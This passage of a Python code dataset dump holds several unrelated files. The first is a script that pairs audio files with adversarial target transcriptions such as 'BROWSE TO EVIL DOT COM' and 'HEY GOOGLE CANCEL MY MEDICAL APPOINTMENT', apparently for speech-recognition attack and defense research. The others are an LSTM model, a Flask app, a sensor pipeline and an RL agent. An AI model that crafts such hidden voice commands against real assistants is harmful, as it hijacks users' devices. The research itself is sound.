len(sys.argv) > 1:\n sys.argv.pop() \n\n target_transcriptions = [\n \"BROWSE TO EVIL DOT COM\",\n \"HEY GOOGLE CANCEL MY MEDICAL APPOINTMENT\",\n \"THIS IS AN ADVERSARIAL EXAMPLE\",\n \"HEY GOOGLE\"\n ]\n file_names = _get_file_names(args.input_dir)\n\n transcription_list = []\n for idx in range(len(file_names)):\n transcription_list.append(random.choice(target_transcriptions)) \n\n # transcription_list = [args.target_transcription] * len(file_names)\n \n line1 = \",\".join(file_names)\n line2 = \",\".join(transcription_list)\n 
line3 = \",\".join(transcription_list)\n\n file_str = \"\\n\".join([line1, line2, line3]) + \"\\n\"\n\n with open(args.output_file, 'w') as f:\n f.write(file_str)\n\n\nif __name__ == '__main__':\n main()","sub_path":"examples/adversarial_asr/create_defense_data.py","file_name":"create_defense_data.py","file_ext":"py","file_size_in_byte":1303,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"186749979","text":"from models.rnn import Rnn\n\nfrom tensorflow.keras.layers import Dense, Dropout, LSTM, Embedding\n\nclass Lstm(Rnn):\n\n def __init__(self):\n super().__init__()\n\n def build_model(self, input_length):\n # input_length = X.shape[1]\n self.model.add(Embedding(5000, 256, input_length=input_length))\n self.model.add(Dropout(0.3))\n self.model.add(LSTM(256, return_sequences=True, dropout=0.3, recurrent_dropout=0.2))\n self.model.add(LSTM(256, dropout=0.3, recurrent_dropout=0.2))\n self.model.add(Dense(2, activation='softmax'))\n self.model.compile(loss='categorical_crossentropy', optimizer='adam', metrics=['accuracy'])\n self.model.summary()\n","sub_path":"models/lstm.py","file_name":"lstm.py","file_ext":"py","file_size_in_byte":700,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"411690589","text":"\nfrom flask import Flask\nfrom route.aaa import main as aaa_routes\n\n\napp = Flask(__name__)\n\napp.register_blueprint(aaa_routes, url_prefix='/aaa')\n\nif __name__ == '__main__':\n config = dict(\n host='0.0.0.0',\n port=80,\n )\n app.run(**config)\n","sub_path":"sdwan/apiary_active_entrance(Active Entrance)/src/app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":261,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"346603109","text":"\"\"\"\nA module consisting of pipeline steps that processed events will pass through.\n\"\"\"\n\nfrom abc import ABC, abstractmethod\nfrom collections 
import deque, namedtuple\nimport logging\nfrom time import time\nfrom gasmon.locations import Location\nfrom gasmon.plot import *\n\nclass AveragedEvent():\n def __init__(self, average_event):\n self.location_id = average_event[0]\n self.x = average_event[1]\n self.y = average_event[2]\n self.value = average_event[3]\n self.timestamp = average_event[4]\n\n def __str__(self):\n return f\"{self.location_id},{self.x}, {self.y}, {self.value},{self.timestamp},\"\n\nclass SensorsAverage():\n def __init__(self, sensors_average):\n self.value = sensors_average[0]\n self.timestamp = sensors_average[1]\n def __str__(self):\n return f\"{self.value},{self.timestamp},\"\n\n\nlogger = logging.getLogger(__name__)\nlogger.setLevel(logging.DEBUG)\n\nclass Pipeline(ABC):\n \"\"\"\n An abstract base class for pipeline steps.\n \"\"\"\n\n @abstractmethod\n def handle(self, events):\n \"\"\"\n Transform the given stream of events into a processed stream of events.\n \"\"\"\n pass\n\n def sink(self, sink):\n \"\"\"\n Funnel events from this Pipeline into the given sink.\n \"\"\"\n return PipelineWithSink(self, sink)\n\n\nclass PipelineWithSink(Pipeline):\n \"\"\"\n A Pipeline with a final processing step (a Sink).\n \"\"\"\n\n def __init__(self, pipeline, sink):\n \"\"\"\n Create a Pipeline with a Sink.\n \"\"\"\n self.pipeline = pipeline\n self.sink = sink\n\n def handle(self, events):\n \"\"\"\n Handle events by first letting the pipeline process them, then \n passing the result to the sink\n \"\"\"\n self.sink.handle(self.pipeline.handle(events))\n\n\nclass FixedDurationSource(Pipeline):\n \"\"\"\n A Pipeline step that processes events for a fixed duration.\n \"\"\"\n\n def __init__(self, run_time_seconds, locations):\n \"\"\"\n Create a FixedDurationSource which will run for the given duration.\n \"\"\"\n self.run_time_seconds = run_time_seconds\n self.events_processed = 0\n self.locations = locations\n\n def handle(self, events):\n \"\"\"\n Pass on all events from the source, but 
cut it off when the time limit is reached.\n \"\"\"\n\n # Calculate the time at which we should stop processing\n end_time = time() + self.run_time_seconds\n logger.info(f'Processing events for {self.run_time_seconds} seconds')\n start_time = time()\n duration = end_time - start_time\n block_time = 20\n\n ids_set = set()\n loc_set = set()\n\n # Process events for as long as we still have time remaining\n i = 0\n j = 1\n k = 1\n recent_events = []\n with open(\"averaged_readings.csv\",'w') as out:\n out.write(\"Location ID, x, y, Value, Timestamp, Block, Total runtime = \"+str(duration)+\", Block time = \"\\\n +str(block_time)+\" \\n\")\n out.close()\n\n with open(\"averaged_sensors.csv\",'w') as out:\n out.write(\"Timestamp, Value, Block, Total runtime = \"+str(duration)+\", Block time = \"+str(block_time)+\" \\n\")\n out.close()\n\n for event in events:\n if time() < end_time:\n if event.event_id in ids_set:\n i = i + 1\n continue\n else:\n recent_events.append(event)\n ids_set.add(event.event_id)\n loc_set.add(event.location_id)\n i=i+1\n if (time() - start_time) > block_time:\n plot_data = []\n av_sensor_values = []\n av_sensor_times = []\n for id in loc_set:\n values = []\n times = []\n for recent_event in recent_events:\n if id in recent_event:\n values.append(float(recent_event.value))\n times.append(int(recent_event.timestamp))\n values_average = float(sum(values)) / float(len(values))\n times_average = float(sum(times)) / float(len(times))\n times_average = int(round(times_average))\n av_sensor_values.append(values_average)\n av_sensor_times.append(float(times_average))\n for Location in self.locations:\n if id == Location.id:\n x = Location.x\n y = Location.y\n loc_average_event = AveragedEvent(average_event=[id, x, y, values_average, times_average])\n print(\"Averaged location event is\")\n logger.debug(f'Processing average event: {loc_average_event}')\n with open(\"averaged_readings.csv\",'a') as out:\n out.write(f'{loc_average_event}'+str(k)+\"\\n\")\n 
out.close()\n xyz = [x, y, values_average]\n plot_data.append(xyz)\n j=j+1\n yield loc_average_event\n\n av_sensor_val = sum(av_sensor_values) / float(len(av_sensor_values))\n av_sensor_time = sum(av_sensor_times) / float(len(av_sensor_times))\n av_sensor_time = int(av_sensor_time)\n all_sensors_average = SensorsAverage(sensors_average=[av_sensor_val,av_sensor_time])\n with open(\"averaged_sensors.csv\", 'a') as out:\n out.write(f'{all_sensors_average}' + str(k) + \"\\n\")\n out.close()\n estimates = self.GaussEstimates(plot_data)\n fit = Gaussian3D(10.0, 1000.0, 500.0, 1000.0, 1000.0)\n plot(plot_data, fit)\n\n k=k+1\n start_time = time()\n self.events_processed += 1\n\n\n else:\n logger.debug(f'Procesing event: {event}')\n self.events_processed += 1\n else:\n logger.info('Finished processing events')\n print(\"Number of unique events processed\")\n print(len(ids_set))\n print(\"All events including duplicates\")\n print(i)\n print(\"Total number of averaged events\")\n print(j)\n return\n\n def GaussEstimates(self, plot_data):\n print(\"AVERAGED LOCATION VALUES USED TO OBTAIN INITIAL ESTIMATES\")\n print(plot_data)\n i=0\n z_values = [location[2] for location in plot_data]\n index = z_values.index(max(z_values))\n","sub_path":"gasmon/pipeline.py","file_name":"pipeline.py","file_ext":"py","file_size_in_byte":7094,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"231329224","text":"from PIL import Image \nimport numpy as np \nimport urllib.request\nimport h5py\nimport requests\nfrom io import BytesIO\nimport matplotlib.pyplot as plt\n\nname =\"fm_-14165_18122\" #the amazon code of the movie\ninfo = [(50, 150), (0, 100)]\nx0 = info[1][0]\nx1 = info[1][1]\ny0 = info[0][0]\ny1 = info[0][1]\n\nDir = \"/Users/loganjaeger/Desktop/aerogel/track ims/\"\n\ndef load_in_ims(code, save_dir):\n\tframe = 1\n\twhile True:\n\t\tpath = Dir + code + \"/\" + str(frame) + \".png\"\n\t\ttry:\n\t\t\timg = 
plt.imread(path)\n\t\t\t#print(img.shape)\n\t\texcept FileNotFoundError:\n\t\t\tbreak\n\t\timg = img[y0:y1, x0:x1, :] #slicing movie so that we only get the part with the track\n\t\tplt.imsave(save_dir + \"/\" + str(frame) + \".png\", img)\n\t\tframe += 1\n\nsave_dir = Dir + \"TRACK-\" + name\n\nload_in_ims(name, save_dir)","sub_path":"CraterFromMovie.py","file_name":"CraterFromMovie.py","file_ext":"py","file_size_in_byte":767,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"462700463","text":"import gym\nimport torch\nimport numpy as np\nimport random\n\nfrom torch.distributions import Categorical\nfrom torch.nn.utils import clip_grad_norm_\nfrom gym.utils import seeding\n\nfrom nets import Memory, v_net, q_net, dueling_q_net, skill_net, classifier_net, RND_module, discrete_AC_mixed, discrete_AC\n\nimport os\nimport time\nimport pickle\nfrom sys import stdout\nimport itertools\nimport curses\n\nimport cv2\nfrom cv2 import VideoWriter, VideoWriter_fourcc\nfrom PIL import Image\n\nwidth = 1024\nheight = 768\nFPS = 60\n\nfourcc = VideoWriter_fourcc(*'MP42')\n\nuse_cuda = torch.cuda.is_available()\ndevice = torch.device(\"cuda\" if use_cuda else \"cpu\")\n\n# Functions\n#############\ndef updateNet(target, source, tau): \n for target_param, source_param in zip(target.parameters(), source.parameters()):\n target_param.data.copy_(target_param.data * (1.0 - tau) + source_param.data * tau)\n\ndef scale_action(a, min, max):\n return (0.5*(a+1.0)*(max-min) + min)\n\ndef set_seed(n_seed):\n random.seed(n_seed)\n np.random.seed(n_seed)\n torch.manual_seed(n_seed)\n if device == \"cuda\": torch.cuda.manual_seed(n_seed)\n\ndef is_float(x):\n return isinstance(x, float)\n\ndef is_int(x):\n return isinstance(x, int)\n\ndef is_tensor(x):\n return isinstance(x, torch.FloatTensor) or isinstance(x, torch.Tensor)\n\n# Classes\n##############\nclass Agent:\n def __init__(self, s_dim, a_dim, n_tasks, params, seed=0):\n\n 
self.params = params.copy()\n default_params = {\n 'n_concepts': 10,\n 'n_skills': 8,\n 'decision_type': 'eps', \n 'alpha': {\n 'sl': 0.1,\n 'ql': 0.1,\n 'cl': 1e-6, \n },\n 'init_epsilon': 1.0,\n 'min_epsilon': 0.4, \n 'delta_epsilon': 2.5e-7, \n 'init_threshold_entropy_alpha': 0.0,\n 'delta_threshold_entropy_alpha': 8e-6,\n 'stoA_learning_type': 'SAC',\n 'DQL_epsds_target_update': 6000, \n 'joint_sq_learning': False, # TODO: add during agent call\n 'target_update_rate': 5e-3, \n 'lr': 3e-4,\n 'dims': {\n 'init_prop': 2,\n 'last_prop': s_dim,\n 'init_ext': 3,\n 'last_ext': s_dim-60,\n }, \n 'batch_size': {\n 'sl': 256,\n 'ql': 256,\n 'tl': 256\n }, \n 'memory_capacity': 1200000,\n 'GAE_lambda': 0.95,\n 'gamma_E': 0.99,\n 'gamma_I': 0.975, \n 'clip_value': 0.5,\n 'factor_I': 1.0,\n 'entropy_annealing': False,\n 'RND_update_proportion': 0.25,\n 'intrinsic_learning': True \n }\n \n for key, value in default_params.items():\n if key not in self.params.keys():\n self.params[key] = value\n \n self.s_dim = s_dim\n self.a_dim = a_dim\n self.sa_dim = self.s_dim + self.a_dim\n self.sars_dim = 2*self.s_dim + self.a_dim + 1\n self.sarsd_dim = self.sars_dim + 1\n self.t_dim = self.sarsd_dim + 3\n\n self.joint = self.params['joint_learning']\n self.n_tasks = n_tasks\n self.seed = seed\n self.n_skills = n_tasks['sl'] if not self.joint else self.params['n_skills']\n self.counter = 0\n self.counter_cl = 0\n v_dim = self.n_skills if not self.joint else n_tasks['ql'] \n\n self.n_concepts = self.params['n_concepts']\n self.dims = self.params['dims']\n self.batch_size = self.params['batch_size']\n self.lr = self.params['lr']\n self.GAE_lambda = self.params['GAE_lambda']\n self.gamma_E = self.params['gamma_E']\n self.gamma_I = self.params['gamma_I'] \n self.clip_value = self.params['clip_value']\n self.decision_type = self.params['decision_type']\n self.stoA_learning_type = self.params['stoA_learning_type']\n self.DQL_epsds_target_update = self.params['DQL_epsds_target_update'] \n 
self.entropy_annealing = self.params['entropy_annealing']\n self.RND_update_proportion = self.params['RND_update_proportion']\n self.active_intrinsic_learning = self.params['intrinsic_learning']\n self.target_update_rate = ['target_update_rate']\n\n self.min_skill_entropy = 0.95 * (-np.log(1/(self.n_skills+1))) # TODO: add to param dict.\n self.novelty_factor = 1.0/np.log(100.0) # TODO: add to param dict.\n\n # Metric weights\n self.min_threshold_entropy_alpha = -a_dim*1.0/2 # TODO: change name or eliminate if not necessary\n self.threshold_entropy_alpha = self.params['init_threshold_entropy_alpha'] # TODO: change name or eliminate if not necessary\n self.delta_threshold_entropy_alpha = self.params['delta_threshold_entropy_alpha'] # TODO: change name or eliminate if not necessary \n alpha = self.params['alpha']\n self.alpha = {} # TODO: allow alpha to depend on task\n for learning_type in ['sl', 'ql', 'cl']: # TODO\n self.alpha[learning_type] = alpha[learning_type]\n \n # self.eta = {}\n # eta = self.params['init_eta']\n # for learning_type in ['ql', 'tl']:\n # self.eta[learning_type] = (eta[learning_type] * torch.ones(self.n_tasks[learning_type]).float().to(device) if is_float(eta[learning_type]) else \n # (eta[learning_type].float().to(device) if is_tensor(eta[learning_type]) else torch.from_numpy(eta[learning_type]).float().to(device)))\n \n self.epsilon = self.params['init_epsilon']\n self.min_epsilon = self.params['min_epsilon']\n self.delta_epsilon = self.params['delta_epsilon']\n self.factor_I = self.params['factor_I']\n \n # Nets and memory\n self.v = { # TODO: change structure of low level AC\n 'sl': v_net(self.dims['last_ext']-self.dims['init_ext'], v_dim, lr=self.lr).to(device), \n }\n self.v_target = {\n 'sl': v_net(self.dims['last_ext']-self.dims['init_ext'], v_dim, lr=self.lr).to(device), \n }\n if self.stoA_learning_type == 'DQL':\n self.critic1 = {\n 'sl': q_net(self.dims['last_ext']-self.dims['init_ext'], a_dim, v_dim, lr=self.lr).to(device),\n 
'ql': dueling_q_net(self.dims['last_ext']-self.dims['init_ext'], self.n_skills+1, n_tasks['ql'], lr=self.lr).to(device),\n }\n self.critic2 = {\n 'sl': q_net(self.dims['last_ext']-self.dims['init_ext'], a_dim, v_dim, lr=self.lr).to(device),\n 'ql': dueling_q_net(self.dims['last_ext']-self.dims['init_ext'], self.n_skills+1, n_tasks['ql'], lr=self.lr).to(device),\n }\n else:\n self.critic1 = {\n 'sl': q_net(self.dims['last_ext']-self.dims['init_ext'], a_dim, v_dim, lr=self.lr).to(device),\n 'ql': discrete_AC(self.n_skills+1, self.dims['last_ext']-self.dims['init_ext'], n_tasks['ql'], lr=self.lr).to(device),\n }\n self.critic2 = {\n 'sl': q_net(self.dims['last_ext']-self.dims['init_ext'], a_dim, v_dim, lr=self.lr).to(device),\n } \n\n self.actor = skill_net(self.n_skills, self.dims['last_prop']-self.dims['init_prop'], a_dim, lr=self.lr).to(device)\n self.classifier = classifier_net(self.n_concepts, self.dims['last_ext']-self.dims['init_ext'], self.n_skills+1, n_tasks=self.n_tasks['ql'], lr=3.0e-4).to(device)\n \n self.memory = {\n 'sl': Memory(self.params['memory_capacity'], n_seed=self.seed),\n 'ql': Memory(self.params['memory_capacity'], n_seed=self.seed),\n 'tl': Memory(self.params['memory_capacity'], n_seed=self.seed)\n }\n \n self.NnSdoAST_cl = torch.ones(self.n_tasks['ql'], self.n_concepts, self.n_skills+1, self.n_concepts).to(device)\n self.NAST_cl = torch.ones(self.n_tasks['ql'], self.n_concepts, self.n_skills+1).to(device)\n \n self.RND = RND_module(self.dims['last_ext']-self.dims['init_ext'], self.n_tasks['tl'], gamma_I=self.gamma_I).to(device) # TODO: fix when n_tasks['tl'] is 0\n \n self.PA_ST_tl = torch.ones(self.n_concepts, self.n_skills+1).to(device)\n self.NAST_MC = torch.zeros(self.n_concepts, self.n_skills+1).to(device)\n self.QAST_MC = torch.zeros(self.n_concepts, self.n_skills+1).to(device)\n\n self.transfer_actor = discrete_AC_mixed(self.n_skills+1, self.dims['last_ext']-self.dims['init_ext'], n_tasks['tl'], self.n_concepts, 
lr=self.lr).to(device)\n \n updateNet(self.v_target['sl'], self.v['sl'],1.0)\n if self.stoA_learning_type == 'DQL':\n updateNet(self.critic2['ql'], self.critic1['ql'],1.0) \n\n def memorize(self, event, learning_type, init=False):\n if init:\n self.memory[learning_type].store(event[np.newaxis,:])\n else:\n self.memory[learning_type].store(event.tolist())\n \n def relate_concept(self, state, explore=True):\n state_cuda = torch.FloatTensor(state[self.dims['init_ext']:self.dims['last_ext']]).to(device).view(1,-1)\n with torch.no_grad():\n return self.classifier.sample_concept(state_cuda, explore=explore)\n\n def decide(self, state, task, learning_type, explore=True, guess=False, rng=None):\n with torch.no_grad():\n if learning_type == 'ql': \n if self.stoA_learning_type == 'DQL':\n skill = self.decide_q_dist(state, task, explore=explore) if self.decision_type == 'q_dist' else self.decide_epsilon(state, task, explore=explore)\n else:\n s_cuda = torch.FloatTensor(state[self.dims['init_ext']:self.dims['last_ext']]).to(device).view(1,-1)\n skill = self.critic1['ql'].sample_skill(s_cuda, task, explore=explore, rng=rng) \n return skill \n elif learning_type == 'tl':\n s_cuda = torch.FloatTensor(state[self.dims['init_ext']:self.dims['last_ext']]).to(device).view(1,-1)\n skill = self.transfer_actor.sample_skill(s_cuda, task, explore=explore, rng=rng)\n return skill \n\n def decide_q_dist(self, state, task, explore=True):\n s_cuda = torch.FloatTensor(state[self.dims['init_ext']:]).to(device).view(1,-1)\n q = self.critic1['ql'](s_cuda).squeeze(0)[task,:] # if np.random.rand() > 0.5 else self.critic2['ql'](s_cuda).squeeze(0)[task,:]\n with torch.no_grad():\n pi = torch.exp((q-q.max())/(self.alpha['ql']+1e-6)).view(-1)\n pi = pi / pi.sum()\n if explore:\n skill = Categorical(probs=pi).sample().item() \n else:\n tie_breaking_dist = torch.isclose(q, q.max()).float()\n tie_breaking_dist /= tie_breaking_dist.sum()\n skill = Categorical(probs=tie_breaking_dist).sample().cpu() \n 
return skill\n\n def decide_epsilon(self, state, task, explore=True):\n s_cuda = torch.FloatTensor(state[self.dims['init_ext']:]).to(device).view(1,-1)\n with torch.no_grad():\n qe = self.critic1['ql'](s_cuda)\n qe = qe.squeeze(0)[task,:]\n tie_breaking_dist = torch.isclose(qe, qe.max()).float()\n tie_breaking_dist /= tie_breaking_dist.sum()\n skill = Categorical(probs=tie_breaking_dist).sample().cpu() \n skill = skill if np.random.rand() > self.epsilon else np.random.randint(self.n_skills+1)\n return skill \n\n def act(self, state, skill, explore=True):\n s_cuda = torch.FloatTensor(state[self.dims['init_prop']:self.dims['last_prop']]).to(device)\n with torch.no_grad():\n a = self.actor.sample_action(s_cuda, skill, explore=explore)if skill < self.n_skills else np.zeros(self.a_dim)\n return a \n\n def learn_DQN(self, only_metrics=False):\n if not only_metrics:\n self.learn_DQN_DQL() if self.stoA_learning_type == 'DQL' else self.learn_DQN_SAC('ql', only_metrics=only_metrics)\n else:\n metrics = {} if self.stoA_learning_type == 'DQL' else self.learn_DQN_SAC('ql', only_metrics=only_metrics)\n return metrics\n\n def learn_DQN_DQL(self):\n self.counter += 1\n batch = self.memory['ql'].sample(self.batch_size['ql'])\n batch = np.array(batch)\n batch_size = batch.shape[0]\n\n if batch_size > 0:\n s = torch.FloatTensor(batch[:,self.dims['init_ext']:self.dims['last_ext']]).to(device)\n A = batch[:,self.s_dim].astype('int')\n re = torch.FloatTensor(batch[:,self.s_dim+1]).view(-1,1).to(device)\n ns = torch.FloatTensor(batch[:,self.s_dim+2+self.dims['init_ext']:self.s_dim+2+self.dims['last_ext']]).to(device)\n d = torch.FloatTensor(batch[:,2*self.s_dim+2]).view(-1,1).to(device)\n T = batch[:,2*self.s_dim+3].astype('int')\n\n # Optimize q networks \n qe = self.critic1['ql'](s)[np.arange(batch_size), T, A].view(-1,1)\n nqe = self.critic1['ql'](ns)[np.arange(batch_size), T, :]\n nqe_target = self.critic2['ql'](ns)[np.arange(batch_size), T, :]\n \n best_skills = nqe.argmax(1)\n 
qe_approx = re/10.0 + self.gamma_E * nqe_target[np.arange(batch_size), best_skills].view(-1,1) * (1.0-d) # + 0.5*RND_error.detach()\n \n q_loss = self.critic1['ql'].loss_func(qe, qe_approx.detach())# + self.critic1['ql'].loss_func(qi_exp, qi_exp_approx.detach()))*IS_weights\n self.critic1['ql'].optimizer.zero_grad()\n q_loss.mean().backward()\n clip_grad_norm_(self.critic1['ql'].parameters(), self.clip_value)\n self.critic1['ql'].optimizer.step()\n\n if self.counter % self.DQL_epsds_target_update == 0:\n updateNet(self.critic2['ql'], self.critic1['ql'], 1.0)\n self.counter = 0\n\n # Anneal epsilon\n self.epsilon = np.max([self.epsilon - self.delta_epsilon, self.min_epsilon]) \n \n def learn_DQN_SAC(self, learning_type, only_metrics=False, learn_alpha=True):\n batch = self.memory[learning_type].sample(self.batch_size[learning_type])\n batch = np.array(batch)\n batch_size = batch.shape[0] \n \n if batch_size > 0: \n s = torch.FloatTensor(batch[:,self.dims['init_ext']:self.dims['last_ext']]).to(device)\n A = batch[:,self.s_dim].astype('int')\n re = torch.FloatTensor(batch[:,self.s_dim+1]).view(-1,1).to(device) / 10.0\n ns = torch.FloatTensor(batch[:,self.s_dim+2+self.dims['init_ext']:self.s_dim+2+self.dims['last_ext']]).to(device)\n d = torch.FloatTensor(batch[:,2*self.s_dim+2]).view(-1,1).to(device)\n T = batch[:,2*self.s_dim+3].astype('int') \n \n # Optimize Q\n qe1, _, qe2, _, PA_sT, log_PA_sT, alpha, log_alpha = self.critic1['ql'](s, T)\n _, nqe1t, _, nqe2t, PnA_nsT, log_PnA_nsT, _, _ = self.critic1['ql'](ns, T)\n \n nqet = torch.min(nqe1t, nqe2t)\n nve = (PnA_nsT * (nqet - alpha.view(-1,1) * log_PnA_nsT)).sum(1, keepdim=True).detach()\n qe_approx = re + self.gamma_E * nve * (1-d)\n\n qe1_A, qe2_A = qe1[np.arange(batch_size), A].view(-1,1), qe2[np.arange(batch_size), A].view(-1,1)\n qe1_loss = (qe1_A - qe_approx.detach())**2\n qe2_loss = (qe2_A - qe_approx.detach())**2\n \n PA_T = PA_sT.mean(0, keepdim=True)\n HA_sT = -(PA_sT * log_PA_sT).sum(1, keepdim=True)\n 
HA_sT_mean = HA_sT.detach().mean()\n qt = torch.min(qe1, qe2).detach()\n z = torch.logsumexp(qt.detach()/(alpha+1e-10), 1, keepdim=True)\n \n pi_loss = (PA_sT * (log_PA_sT - (qt/(alpha+1e-10) - z)).detach()).sum(1, keepdim=True)\n if learn_alpha:\n log_pi_target = qt.detach()/(alpha+1e-10) - z\n pi_target = torch.exp(log_pi_target) \n H_pi_target = -(pi_target * log_pi_target).sum(1, keepdim=True)\n H_pi_target_mean = H_pi_target.mean()\n scaled_min_entropy = self.min_skill_entropy * self.epsilon\n alpha_loss = log_alpha * (H_pi_target - scaled_min_entropy).detach()\n\n if not only_metrics:\n self.critic1['ql'].qe1.optimizer.zero_grad()\n qe1_loss.mean().backward()\n clip_grad_norm_(self.critic1['ql'].qe1.parameters(), self.clip_value)\n self.critic1['ql'].qe1.optimizer.step()\n\n self.critic1['ql'].qe2.optimizer.zero_grad()\n qe2_loss.mean().backward()\n clip_grad_norm_(self.critic1['ql'].qe2.parameters(), self.clip_value)\n self.critic1['ql'].qe2.optimizer.step()\n \n if learn_alpha:\n self.critic1['ql'].alpha_optim.zero_grad()\n alpha_loss.mean().backward()\n self.critic1['ql'].alpha_optim.step()\n self.critic1['ql'].alpha = self.critic1['ql'].log_alpha.exp()\n\n self.critic1['ql'].actor.optimizer.zero_grad()\n pi_loss.mean().backward()\n clip_grad_norm_(self.critic1['ql'].actor.parameters(), self.clip_value)\n self.critic1['ql'].actor.optimizer.step()\n\n self.critic1['ql'].update_targets(self.target_update_rate) \n\n # Anneal epsilon\n self.epsilon = np.max([self.epsilon - self.delta_epsilon, self.min_epsilon])\n \n else:\n HA_sT = torch.zeros(1).to(device)\n \n if only_metrics:\n metrics = {\n 'H(A|s,T)': HA_sT.mean().detach().cpu().numpy() \n } \n return metrics\n\n def learn_transfer_policy(self, learning_type, only_metrics=False):\n self.CG_SAC_learning(only_metrics=only_metrics)\n \n def CG_SAC_learning(self, only_metrics=False, CG=True, learn_alpha=True):\n batch = self.memory['tl'].sample(self.batch_size['tl'])\n batch = np.array(batch)\n batch_size = 
batch.shape[0] \n \n if batch_size > 0: \n s = torch.FloatTensor(batch[:,self.dims['init_ext']:self.dims['last_ext']]).to(device)\n A = batch[:,self.s_dim].astype('int')\n re = torch.FloatTensor(batch[:,self.s_dim+1]).view(-1,1).to(device)\n ns = torch.FloatTensor(batch[:,self.s_dim+2+self.dims['init_ext']:self.s_dim+2+self.dims['last_ext']]).to(device)\n d = torch.FloatTensor(batch[:,2*self.s_dim+2]).view(-1,1).to(device)\n T = batch[:,2*self.s_dim+3].astype('int') \n\n T_one_hot = torch.zeros(batch_size, self.n_tasks['tl']).float().to(device)\n T_one_hot[np.arange(batch_size), T] = torch.ones(batch_size).float().to(device)\n \n # Optimize Q\n qe1, _, qe2, _, qi1_exp, _, qi2_exp, _, PA_sT, log_PA_sT, alpha, log_alpha, Alpha, log_Alpha = self.transfer_actor(s, T) # TODO: change name of qi_exp to qi\n _, nqe1t, _, nqe2t, _, _, _, _, PnA_nsT, log_PnA_nsT, _, _, _, _ = self.transfer_actor(ns, T)\n \n nqet = torch.min(nqe1t, nqe2t)\n nve = (PnA_nsT * (nqet - 0.01 * log_PnA_nsT)).sum(1, keepdim=True).detach()\n qe_approx = re + self.gamma_E * nve * (1-d)\n \n qe1_A, qe2_A = qe1[np.arange(batch_size), A].view(-1,1), qe2[np.arange(batch_size), A].view(-1,1)\n qe1_loss = (qe1_A - qe_approx.detach())**2\n qe2_loss = (qe2_A - qe_approx.detach())**2\n \n PA_T = PA_sT.mean(0, keepdim=True)\n HA_sT = -(PA_sT * log_PA_sT).sum(1, keepdim=True)\n HA_sT_mean = HA_sT.detach().mean()\n \n qt = torch.min(qe1, qe2).detach() + self.factor_I * torch.min(qi1_exp, qi2_exp).detach()\n z = torch.logsumexp(qt.detach()/(alpha+1e-10), 1, keepdim=True)\n\n if CG:\n PS_s = self.classifier(s)[0].detach() \n ideal_PA_sT = torch.exp(qt/(alpha.detach() + 1e-10) - z).detach()\n ideal_PA_sT = ideal_PA_sT / ideal_PA_sT.sum(1, keepdim=True)\n Z = torch.logsumexp(self.QAST_MC.detach() / (Alpha.view(-1,1) + 1e-10), 1, keepdim=True)\n PA_ST = torch.exp(self.QAST_MC.detach() / (Alpha.view(-1,1) + 1e-10) - Z)\n PA_ST = (PA_ST + 1e-10) / ((PA_ST + 1e-10).sum(1, keepdim=True)) \n \n log_PA_ST = torch.log(PA_ST 
+ 1e-10) \n HA_ST = -(PA_ST * log_PA_ST).sum(1)\n HA_ST_mean = (PS_s * HA_ST.view(1,-1)).sum(1, keepdim=True) \n\n pi_loss = (PA_sT * (log_PA_sT - (qt/(alpha+1e-10) - z)).detach()).sum(1, keepdim=True)\n if CG or learn_alpha:\n log_novelty_ratios = self.RND.novelty_ratios(s, T[0]).detach() \n\n if CG:\n S = PS_s.argmax(1).cpu().numpy()\n HS_s = -(PS_s * torch.log(PS_s + 1e-10)).sum(1, keepdim=True)\n concept_entropy_bottleneck = 1 - HS_s.detach() / np.log(self.n_concepts)\n divergence_per_concept = (PA_sT * (log_PA_sT - log_PA_ST[S,:]).detach()).sum(1, keepdim=True)\n novelty_factor_0 = 1.0 - 1.0 / (1.0 + torch.exp(-2.0 * (log_novelty_ratios - np.log(10)))).view(-1,1)\n total_bottleneck = novelty_factor_0.detach() * concept_entropy_bottleneck\n pi_loss = (1-total_bottleneck) * pi_loss + total_bottleneck * divergence_per_concept \n\n if learn_alpha:\n log_pi_target = qt.detach()/(alpha+1e-10) - z\n pi_target = torch.exp(log_pi_target) \n H_pi_target = -(pi_target * log_pi_target).sum(1, keepdim=True)\n H_pi_target_mean = H_pi_target.mean()\n scaled_min_entropy = self.min_skill_entropy * (1.0 / (1.0 + self.novelty_factor * log_novelty_ratios))\n alpha_loss = log_alpha * (H_pi_target - scaled_min_entropy.view(-1,1)).detach()\n\n scaled_min_entropy_mean = scaled_min_entropy.mean()\n active_concepts = (self.QAST_MC.sum(-1) > 0.0).float().view(-1).detach()\n Alpha_loss = log_Alpha.view(-1) * (HA_ST.view(-1) - 0.5*(scaled_min_entropy_mean + np.log(self.n_skills + 1))).detach() * active_concepts\n \n self.transfer_actor.qe1.optimizer.zero_grad()\n qe1_loss.mean().backward()\n clip_grad_norm_(self.transfer_actor.qe1.parameters(), self.clip_value)\n self.transfer_actor.qe1.optimizer.step()\n\n self.transfer_actor.qe2.optimizer.zero_grad()\n qe2_loss.mean().backward()\n clip_grad_norm_(self.transfer_actor.qe2.parameters(), self.clip_value)\n self.transfer_actor.qe2.optimizer.step()\n\n if learn_alpha:\n self.transfer_actor.alpha_optim.zero_grad()\n 
